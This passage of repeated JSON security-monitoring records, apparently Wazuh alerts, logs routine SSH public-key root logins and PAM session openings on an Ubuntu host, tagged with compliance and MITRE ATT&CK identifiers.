16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
